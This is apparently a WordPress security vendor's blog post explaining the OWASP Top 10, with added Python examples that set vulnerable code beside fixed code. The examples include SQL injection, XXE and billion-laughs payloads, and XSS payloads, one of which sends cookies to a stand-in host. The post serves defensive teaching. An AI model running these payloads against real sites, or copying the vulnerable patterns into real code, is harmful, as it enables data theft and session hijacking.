The Open Web Application Security Project (OWASP) is a nonprofit foundation that works to improve the security of software. The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
The OWASP Top 10 Web Application Security Risks
1. Injection
An Injection flaw occurs when untrusted input, such as a form field, cookie, or URL parameter, is sent to an interpreter as part of a command or query without being kept separate from it. In WordPress the most common form is SQL injection: a plugin or theme builds a database query by concatenating user input, so the attacker's input is parsed as SQL and runs with the database privileges of the site. The result can be anything from exporting the list of users and password hashes to deleting tables in your database.
Keeping data separate from commands and queries prevents injection: use parameterized queries (in WordPress, $wpdb->prepare() with %s and %d placeholders) instead of string concatenation, and validate input against an allowlist wherever the value has a known shape, such as an integer ID.
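The following is an added example, not code from the original post or from iThemes Security Pro. It puts the vulnerable string-built query next to the parameterized one, using an in-memory SQLite table with constructed rows standing in for wp_users; the safe form is the same pattern that $wpdb->prepare() implements in WordPress.

```python
"""SQL injection, vulnerable and parameterised forms side by side.

Added example, not code from the original post: it uses an in-memory SQLite
table with constructed rows standing in for wp_users.  The safe form is the
same pattern that $wpdb->prepare() implements in WordPress.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for wp_users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)"
    )
    conn.executemany(
        "INSERT INTO wp_users VALUES (?, ?, ?)",
        [(1, "admin", "$P$Bhash-of-admin"), (2, "alice", "$P$Bhash-of-alice")],
    )
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, login: str) -> list:
    """The flaw: the untrusted value is pasted into the SQL text, so the
    database parses it as SQL rather than treating it as data."""
    sql = (
        "SELECT ID, user_login, user_pass FROM wp_users "
        f"WHERE user_login = '{login}'"
    )
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, login: str) -> list:
    """The fix: the query text is fixed and the value travels separately as a
    bound parameter, so it can only ever be compared as a string."""
    sql = "SELECT ID, user_login, user_pass FROM wp_users WHERE user_login = ?"
    return conn.execute(sql, (login,)).fetchall()


# Constructed attacker input: closes the quoted string and makes the WHERE
# clause true for every row, which dumps every user's password hash.
PAYLOAD = "nobody' OR '1'='1"


if __name__ == "__main__":
    db = make_db()
    print(find_user_vulnerable(db, PAYLOAD))  # every row comes back
    print(find_user_safe(db, PAYLOAD))        # [] : no user has that literal name
```

Run it and the vulnerable query returns both rows for the payload while the parameterized one returns nothing, because the database never saw the payload as SQL.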
2. Broken Authentication
A Broken Authentication vulnerability lets an attacker obtain or forge passwords, keys, or session tokens, or exploit other implementation flaws in login and session handling, to take over user accounts. Common examples are credential stuffing and brute-force attacks against the login form, weak or default passwords, and session IDs that are exposed in URLs or not rotated after login.
You can help protect your website from Broken Authentication by using two-factor authentication, limiting failed login attempts, rejecting weak and known-breached passwords, and expiring sessions on logout and after inactivity.
3. Sensitive Data Exposure
Applications and APIs that do not properly protect sensitive data, for example by sending it in clear text, storing it unencrypted, or hashing passwords with a fast or unsalted algorithm, could allow an attacker to obtain credit card numbers, health records, or other private personal information.
Data can be exposed either when it is in transit or when it is at rest.
- An example of data in transit is when a credit card number gets sent from your customer’s browser to your website’s payment gateway.
- Data at rest is data that is stored and not currently being used. An example of data at rest is your BackupBuddy backup stored in an offsite location. The backup will remain at rest until it is needed.
Serving your site only over HTTPS (install an SSL/TLS certificate and redirect all HTTP requests to HTTPS) protects data in transit. Encrypting backups and other stored data, and storing passwords only as salted slow hashes such as bcrypt, protects data at rest. The simplest protection of all is not to store sensitive data you do not need, such as full card numbers.
4. XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. An external entity can point at a local file (such as a password file on the server's disk) or at an internal network address, so an attacker who can submit XML can trick the parser into reading that resource and including its contents in the response, or in a request to a server the attacker controls.
The most reliable way to prevent XXE is to disable DTD processing and external entity resolution in every XML parser the application uses. In PHP, never pass LIBXML_NOENT to simplexml_load_string() or DOMDocument::loadXML(), and on older libxml versions call libxml_disable_entity_loader(true) before parsing. Where you control the format, prefer less complex data formats such as JSON, and avoid deserializing sensitive data from untrusted sources.
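As an added example (not code from the original post), the guard below refuses any XML that declares a DOCTYPE or an entity before the document reaches the real parser. It asks expat to report those declarations and aborts on the first one, which is the approach the defusedxml package takes; the same check works in front of any parser. The three documents it is run against are constructed.

```python
"""Rejecting XML that carries a DTD before it reaches the real parser.

Added example, not code from the original post.  Python's stdlib parser does
not fetch external entities on its own, but many parsers do, and the same
guard works in front of any of them: expat is asked to report DOCTYPE and
ENTITY declarations, and the document is refused the moment one appears.
"""
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class ForbiddenDTD(ValueError):
    """Raised for any document that declares a DOCTYPE or an entity."""


def check_no_dtd(data: bytes) -> None:
    """Walk the document with expat and abort on the first DTD construct.

    Exceptions raised inside a handler propagate out of Parse(), so the
    document is never processed past the offending declaration.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenDTD(f"DOCTYPE not allowed (root {name!r}, system id {sysid!r})")

    def on_entity(*decl):
        raise ForbiddenDTD(f"ENTITY declaration not allowed: {decl[0]!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source with DTD processing refused."""
    check_no_dtd(data)
    return ET.fromstring(data)


# Constructed inputs: a benign settings document, a classic file-read XXE
# payload, and an entity-expansion ("billion laughs") payload.
BENIGN = b"<settings><site>example.test</site></settings>"
XXE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE d [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<d>&xxe;</d>"
)
BOMB = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;">]>'
    b"<lolz>&lol2;</lolz>"
)
# A comment that merely mentions DOCTYPE: a regex filter would reject this,
# while the parser-level check correctly lets it through.
TRICKY_BUT_SAFE = b"<a><!-- not a <!DOCTYPE x> declaration --></a>"


def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted_xml(data)
    except ForbiddenDTD:
        return True
    return False


if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN).find("site").text)  # example.test
    print(is_rejected(XXE), is_rejected(BOMB), is_rejected(TRICKY_BUT_SAFE))  # True True False
```

Rejecting every DTD, rather than only external entities, also stops entity-expansion denial of service, and it is cheap: legitimate data-exchange XML almost never needs a DOCTYPE.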
5. Broken Access Control
A Broken Access Control vulnerability would allow an attacker to bypass authorization and perform tasks that would typically be restricted to users with higher privileges such as an administrator.
In the context of WordPress, a Broken Access Control vulnerability could allow a user with the role of Subscriber to perform Administrator-level tasks like adding or removing plugins and users. The usual cause is a plugin or theme handler (an admin-ajax.php action or a REST endpoint) that never calls current_user_can() and instead trusts an ID or role supplied by the client, or checks only a nonce, which proves intent but not authorization.
iThemes Security Pro can help protect your website against Broken Access Control by restricting admin access to a list of Trusted Devices.
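The two failure modes described above, as an added example that is not code from the original post or from iThemes Security Pro: a handler that reads the caller's role from a form field the attacker can edit, and one that checks login but not which object is being accessed, each beside the server-side check that fixes it. The roles, capabilities, users and sessions are constructed in-memory stand-ins for WordPress's role and capability tables; `user_can()` does what current_user_can() does in WordPress.

```python
"""Broken access control: trusting the client vs. checking server-side.

Added example, not code from the original post or from iThemes Security Pro.
Everything below is an in-memory, constructed stand-in for WordPress's users,
roles and sessions.
"""

# Constructed subset of a WordPress-style role -> capability mapping.
ROLE_CAPS = {
    "administrator": {"read", "edit_posts", "install_plugins", "edit_users"},
    "editor": {"read", "edit_posts", "edit_others_posts"},
    "subscriber": {"read"},
}
USERS = {
    1: {"login": "admin", "role": "administrator", "email": "admin@example.test"},
    7: {"login": "sub", "role": "subscriber", "email": "sub@example.test"},
}
SESSIONS = {"sess-admin": 1, "sess-sub": 7}  # session cookie -> user id


class Forbidden(PermissionError):
    pass


def current_user(request: dict) -> dict:
    """Resolve the acting user from the session cookie and nothing else."""
    user_id = SESSIONS.get(request.get("cookies", {}).get("session"))
    if user_id is None:
        raise Forbidden("not logged in")
    return {"id": user_id, **USERS[user_id]}


def user_can(user: dict, capability: str) -> bool:
    return capability in ROLE_CAPS[user["role"]]


def install_plugin_vulnerable(request: dict) -> str:
    """Flaw: the role comes from a hidden form field the attacker can edit."""
    if request["params"].get("role") != "administrator":
        raise Forbidden("administrators only")
    return f"installed {request['params']['plugin']}"


def install_plugin_safe(request: dict) -> str:
    if not user_can(current_user(request), "install_plugins"):
        raise Forbidden("missing install_plugins capability")
    return f"installed {request['params']['plugin']}"


def view_email_vulnerable(request: dict) -> str:
    """Flaw (insecure direct object reference): any logged-in user can read
    any profile simply by changing the user_id parameter."""
    current_user(request)
    return USERS[int(request["params"]["user_id"])]["email"]


def view_email_safe(request: dict) -> str:
    """Object-level check: own profile, or the edit_users capability."""
    me = current_user(request)
    target = int(request["params"]["user_id"])
    if target != me["id"] and not user_can(me, "edit_users"):
        raise Forbidden("cannot view another user's profile")
    return USERS[target]["email"]


# Constructed request from the subscriber, with a tampered role field and
# the administrator's user_id substituted.
TAMPERED = {
    "cookies": {"session": "sess-sub"},
    "params": {"role": "administrator", "plugin": "backdoor", "user_id": "1"},
}


def demo() -> dict:
    """Summarise each handler's decision on the tampered request."""
    out = {}
    for name, fn in [("install_vulnerable", install_plugin_vulnerable),
                     ("install_safe", install_plugin_safe),
                     ("email_vulnerable", view_email_vulnerable),
                     ("email_safe", view_email_safe)]:
        try:
            out[name] = fn(TAMPERED)
        except Forbidden as e:
            out[name] = f"denied: {e}"
    return out


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Note that hiding the plugin menu from subscribers would not have prevented either attack; the request can be sent without the menu, so the check has to happen in the handler.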
6. Security Misconfiguration
Security Misconfiguration is the most common issue on the list. This type of vulnerability is typically the result of insecure default configurations, overly descriptive error messages, and misconfigured HTTP headers.
Security misconfiguration issues can be mitigated by removing unused features, plugins, themes, and sample or installer files; keeping all libraries up to date; turning off detailed error output on production sites (in WordPress, leave WP_DEBUG_DISPLAY off); disabling directory listing; and setting security headers such as Content-Security-Policy and Strict-Transport-Security.
7. Cross-Site Scripting (XSS)
A Cross-Site Scripting vulnerability occurs when a web application includes untrusted data in a page without validating or escaping it, so that attacker-controlled script is executed by the victim's browser. In WordPress this usually means a plugin or theme echoing a URL parameter, form field, or comment without passing it through esc_html(), esc_attr(), esc_url(), or wp_kses(). An attacker can exploit the vulnerability to run malicious code in the victim's web browser, redirect the victim to a malicious website, or hijack the user's session.
The iThemes Security Pro Trusted Devices feature can help to protect against session hijacking by checking that a user’s device does not change during a session.
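As an added example (not code from the original post or from iThemes Security Pro), here is a comment rendered the way a theme template would, once with raw interpolation and once escaping each value for the HTML context it lands in: text node, attribute value, and URL. The attacker inputs are constructed, one per context; the WordPress equivalents of the three escapes are esc_html(), esc_attr() and esc_url().

```python
"""Cross-site scripting: unescaped output beside context-aware escaping.

Added example, not code from the original post or from iThemes Security Pro.
The comment values are constructed attacker input.
"""
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def safe_url(url: str) -> str:
    """Allow only absolute http(s) URLs, then escape for an attribute value.

    An allowlist of schemes beats blocking 'javascript:' because browsers
    tolerate case changes, leading whitespace and embedded tabs or newlines
    that a blocklist would miss; none of those parse as http or https here.
    """
    cleaned = url.strip()
    if urlsplit(cleaned).scheme.lower() not in ALLOWED_SCHEMES:
        return "#"
    return html.escape(cleaned, quote=True)


def render_comment_vulnerable(author: str, url: str, body: str) -> str:
    """Flaw: every value is dropped into the markup as-is."""
    return f'<a href="{url}">{author}</a><p>{body}</p>'


def render_comment_safe(author: str, url: str, body: str) -> str:
    """Each value escaped for its own context: attribute, text node, URL."""
    return (
        f'<a href="{safe_url(url)}" rel="nofollow ugc">'
        f"{html.escape(author, quote=True)}</a>"
        f"<p>{html.escape(body)}</p>"
    )


# Constructed attacker input: one payload per context.
EVIL_AUTHOR = '" onmouseover="alert(document.cookie)'  # breaks out of the attribute
EVIL_URL = " JavaScript:alert(1)"                       # script-scheme URL
EVIL_BODY = "<script>location='https://evil.test/?c='+document.cookie</script>"


if __name__ == "__main__":
    print(render_comment_vulnerable(EVIL_AUTHOR, EVIL_URL, EVIL_BODY))
    print(render_comment_safe(EVIL_AUTHOR, EVIL_URL, EVIL_BODY))
```

Escaping is context-specific: the body escape above is not enough for a value placed inside a `<script>` block or an inline event handler, where the only safe choice is not to put untrusted data at all.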
8. Insecure Deserialization
Serialization converts objects from an application’s code into a format that can be restored later, like exporting your iThemes Security Pro settings to a JSON file.
Deserialization is the reverse of that process, taking data structured in some format and rebuilding it back into an object. For example, taking the iThemes Security Pro settings that you stored in a JSON file and importing them onto a new website.
Insecure Deserialization flaws often lead to remote code execution, and even when they do not, they can enable replay, injection, and privilege escalation attacks.
The only safe architectural choice is not to accept serialized objects from untrusted sources. Where that is unavoidable, verify an integrity signature over the serialized data before deserializing it, restrict which types may be instantiated (in PHP, unserialize($data, ['allowed_classes' => false])), and log and alert on deserialization failures.
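The settings-import scenario above, as an added example that is not code from the original post or from iThemes Security Pro. The vulnerable importer uses Python's pickle, whose loads() calls any callable the serialized data names, much as PHP's unserialize() instantiates any class with magic methods. The safe importer exports plain JSON (no objects) wrapped in an HMAC, so only files produced with the server-side key are accepted and tampering is detected before anything is parsed. The key, the settings and the malicious file are constructed.

```python
"""Insecure deserialization of a settings file, and a safe import path.

Added example, not code from the original post or from iThemes Security Pro.
The key, the settings and the attacker's file are constructed.
"""
import base64
import hashlib
import hmac
import json
import pickle

EXECUTED = []  # records side effects caused purely by deserializing


def side_effect(note: str) -> str:
    """Stands in for os.system(), a file write, or anything else an attacker
    would have the unpickler call."""
    EXECUTED.append(note)
    return note


class Malicious:
    """__reduce__ tells pickle how to rebuild the object: 'call side_effect(...)'."""

    def __reduce__(self):
        return (side_effect, ("code ran during import",))


def attacker_settings_file() -> bytes:
    return pickle.dumps(Malicious())


def import_settings_vulnerable(blob: bytes):
    """Flaw: deserializes whatever the uploaded file contains."""
    return pickle.loads(blob)


KEY = b"constructed-server-side-key-never-shipped"  # real deployments: random, stored server-side


def export_settings(settings: dict, key: bytes = KEY) -> bytes:
    """JSON (data only, no objects) base64-encoded and tagged with HMAC-SHA256."""
    payload = base64.urlsafe_b64encode(json.dumps(settings, sort_keys=True).encode())
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    return payload + b"." + tag


def import_settings_safe(blob: bytes, key: bytes = KEY) -> dict:
    """Verify the tag over the still-encoded payload first; only then decode."""
    payload, sep, tag = blob.rpartition(b".")
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode()
    if not sep or not hmac.compare_digest(expected, tag):
        raise ValueError("settings file rejected: missing or invalid signature")
    settings = json.loads(base64.urlsafe_b64decode(payload))
    if not isinstance(settings, dict):
        raise ValueError("settings file rejected: not an object")
    return settings


def tamper(blob: bytes) -> bytes:
    """Flip one bit of the encoded payload, as an attacker editing the file would."""
    payload, sep, tag = blob.rpartition(b".")
    return bytes([payload[0] ^ 0x01]) + payload[1:] + sep + tag


def is_rejected(blob: bytes) -> bool:
    try:
        import_settings_safe(blob)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(import_settings_vulnerable(attacker_settings_file()), EXECUTED)
    good = export_settings({"lockout_threshold": 5, "two_factor": True})
    print(import_settings_safe(good))
    print(is_rejected(tamper(good)), is_rejected(attacker_settings_file()))  # True True
```

The HMAC only helps when the key never leaves the server; a settings file meant to be edited by hand or exchanged between sites cannot carry it, and then the remaining defence is that the format can only express data, never code.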
9. Using Components with Known Vulnerabilities
It is common for developers to use components such as libraries and frameworks in their applications. This includes WordPress plugin and theme developers. These third-party libraries and frameworks introduce security holes if they are not kept up to date, and a vulnerability in one of them is as exploitable as a vulnerability in your own code.
Developers can minimize the risk of using components with known vulnerabilities by keeping an inventory of the components they ship (including transitive dependencies), removing unused third-party code, using only components from trusted sources, and watching the advisories for the components they keep so that patches are applied promptly.
10. Insufficient Logging & Monitoring
Insufficient logging and monitoring delays the detection of a security breach. Breach studies have repeatedly put the average time to detect a breach at more than 200 days. That amount of time allows an attacker to move on to other systems and to modify, steal, or destroy more data. Logging only helps if the events that matter (failed and successful logins, privilege changes, plugin installs, file changes) are recorded with enough detail to reconstruct what happened, and someone or something actually reviews them.
The iThemes Security Pro WordPress Security Logs record many kinds of malicious activity, use the information collected to block attacks, and alert you when something goes wrong.
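As an added example of the kind of monitoring the section describes (not code from the original post or from iThemes Security Pro), the detector below runs over authentication log lines and raises two alerts: an IP that reaches a threshold of failed logins inside a sliding window, and a successful login from an IP that had several recent failures, which is the signature of a password-guessing attack that eventually worked. The log format and the lines are constructed.

```python
"""Detecting brute-force logins from authentication log lines.

Added example, not code from the original post or from iThemes Security Pro.
The log format and the sample lines are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)

# Constructed sample log: alice mistypes once; 203.0.113.5 guesses the admin
# password six times in ten seconds and then gets in.
SAMPLE_LOG = """
2024-05-01T10:00:01Z ip=198.51.100.7 user=alice result=fail
2024-05-01T10:00:09Z ip=198.51.100.7 user=alice result=ok
2024-05-01T10:00:10Z ip=203.0.113.5 user=admin result=fail
2024-05-01T10:00:12Z ip=203.0.113.5 user=admin result=fail
2024-05-01T10:00:14Z ip=203.0.113.5 user=admin result=fail
2024-05-01T10:00:16Z ip=203.0.113.5 user=admin result=fail
2024-05-01T10:00:18Z ip=203.0.113.5 user=admin result=fail
2024-05-01T10:00:20Z ip=203.0.113.5 user=admin result=fail
2024-05-01T10:00:25Z ip=203.0.113.5 user=admin result=ok
""".strip().splitlines()


def parse_line(line: str):
    m = LINE.match(line)
    if not m:
        return None  # unknown format: skip rather than crash the detector
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ts, m["ip"], m["user"], m["result"]


def detect(lines, threshold=5, min_failures=3, window=timedelta(minutes=1)):
    """Return alerts as (kind, ip, timestamp, failure_count) tuples."""
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    alerted = set()                # ips already reported in their current streak
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, user, result = parsed
        recent = failures[ip]
        while recent and ts - recent[0] > window:
            recent.popleft()       # slide the window forward
        if result == "fail":
            recent.append(ts)
            if len(recent) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append(("brute_force", ip, ts.isoformat(), len(recent)))
        else:
            if len(recent) >= min_failures:
                alerts.append(("success_after_failures", ip, ts.isoformat(), len(recent)))
            recent.clear()
            alerted.discard(ip)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The second alert is the one worth paging on: a lockout already handles the first, but a success after a burst of failures means a credential is probably compromised and the session should be terminated and the password reset.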
Add More Protection With the iThemes Security Pro Site Scan
In our bi-monthly Vulnerability Roundup posts, we share all of the latest disclosed WordPress core, plugin, and theme vulnerabilities. Many of the plugins and themes that we cover in our roundups have exploits that are in the OWASP top 10 list.
The #1 culprit of hacked websites is vulnerabilities for which a patch was available but not applied. Add the iThemes Security Pro Site Scan to your WordPress security toolbelt to protect your website from getting taken down by a known security issue. The iThemes Security Pro Site Scanner checks your site for known vulnerabilities and automatically applies a patch if one is available.
Whether your theme is using components with known vulnerabilities, or you are using a plugin that has a known Cross-Site Scripting vulnerability, the iThemes Security Pro Site Scan has you covered.
Wrapping Up: OWASP Top 10
The OWASP Top 10 list is a great resource to spread awareness of how to secure your applications against the most common security vulnerabilities. Unfortunately, the reason these vulnerabilities make the top 10 list is that they are prevalent. Using a WordPress security plugin like iThemes Security Pro can help to secure and protect your website from many of these common security issues.
Each week, Michael puts together the WordPress Vulnerability Report to help keep your sites safe. As Product Manager at iThemes, he helps us continue to improve the iThemes product lineup. He’s a giant nerd & loves learning about all things tech, old & new. You can find Michael hanging out with his wife & daughter, reading or listening to music when not working.